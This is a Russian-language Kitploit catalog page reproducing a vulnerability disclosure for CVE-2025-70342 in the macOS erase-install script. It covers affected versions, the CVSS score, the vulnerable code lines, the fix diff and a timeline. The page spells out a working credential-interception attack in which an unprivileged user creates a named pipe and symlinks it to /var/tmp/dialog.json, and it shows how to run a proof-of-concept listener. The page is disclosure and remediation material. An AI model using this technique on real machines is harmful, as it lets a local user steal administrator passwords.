Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-70342 — CVE-2025-70342: Перехват учётных данных через именованный канал в erase-install | Kitploit
Инструменты/GitHubGitHub/malvector/cve-2025-70342
Повышение привилегийАнализ уязвимостейЭксплуатация
GitHubmalvector/cve-2025-70342

CVE-2025-70342

CVE-2025-70342: Перехват учётных данных через именованный канал в erase-install

Репозиторий
6 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-70342: Перехват учётных данных через именованный канал (Named Pipe) в erase-install

Сводка

erase-install до версии v40.4 (коммит 2c31239) записывает вывод учётных данных swiftDialog по жёстко заданному пути /var/tmp/dialog.json. На Mac с Apple Silicon учётные данные администратора, введённые во время операций переустановки/стирания, записываются в это предсказуемое, доступное для записи всем пользователям место. Локальный непривилегированный злоумышленник может создать именованный канал (FIFO) по этому пути для перехвата учётных данных администратора в реальном времени.

Затронутые версии

  • Уязвимая версия: erase-install <= 40.4
  • Исправлено: коммит 2c31239 (после PR #574)

CVSS 3.1

Оценка: 7.1 (высокая)

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Сведения об уязвимости

Жёстко заданный путь вывода учётных данных (CWE-732)

Файл: erase-install.sh

Строка 72:

root@kitploit:~
dialog_output="/var/tmp/dialog.json"

Строка 124:

root@kitploit:~
"$dialog_bin" "${dialog_args[@]}" ... 2>/dev/null > "$dialog_output"

На Mac с Apple Silicon erase-install запрашивает у администратора учётные данные через swiftDialog. Учётные данные (имя пользователя + пароль) записываются через перенаправление оболочки в /var/tmp/dialog.json — жёстко заданный путь в каталоге, доступном для записи всем. Скрипт не проверяет, не был ли этот путь изменён перед записью.

Сценарий атаки

root@kitploit:~
1. Unprivileged attacker creates a named pipe (FIFO): mkfifo /tmp/.fifo
2. Attacker creates symlink: ln -s /tmp/.fifo /var/tmp/dialog.json
3. Attacker reads from FIFO (blocks, waiting for data)
4. Admin runs: sudo erase-install.sh --erase
5. Admin enters credentials in swiftDialog prompt
6. Credentials flow through symlink → FIFO → attacker's terminal

Эта атака не требует особого выбора времени или состояния гонки — злоумышленник просто создаёт символическую ссылку и ждёт.

Proof of Concept

Предварительные требования

  • Mac на Apple Silicon (запрос учётных данных срабатывает только на arm64)
  • Любая непривилегированная локальная учётная запись пользователя

Использование

root@kitploit:~
# Start the listener (as unprivileged user)
python3 poc.py

# Wait for admin to run erase-install with --erase or --reinstall
# Credentials will be printed to stdout when captured

# Cleanup
python3 poc.py --cleanup

Подробнее см. в poc.py.

Устранение уязвимости

  • Обновите erase-install до версии, содержащей коммит 2c31239 или более поздней
  • Исправление использует mktemp для генерации случайного имени файла, что предотвращает предсказание пути:
root@kitploit:~
- dialog_output="/var/tmp/dialog.json"
+ dialog_output=$(/usr/bin/mktemp /var/tmp/dialog.XXX.json)

Хронология

ДатаСобытие
2025-12-23Уязвимость обнаружена
2025-12-23О проблеме сообщено мейнтейнеру
2025-12-24Исправление объединено через PR #574

Автор

  • cooldadhacking (GitHub)

Ссылки

  • erase-install PR #574
  • Коммит исправления 2c31239

Предупреждение

Данный proof of concept предоставлен только для образовательных целей и авторизованного тестирования безопасности. Используйте ответственно и только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.

Скачать инструмент
МетрикаЗначение
Вектор атакиЛокальный
Сложность атакиНизкая
Требуемые привилегииНизкие
Взаимодействие с пользователемТребуется (администратор вводит учётные данные)
Область действияБез изменений
КонфиденциальностьВысокая
ЦелостностьВысокая
ДоступностьНет
2026-02-20
Назначен CVE-2025-70342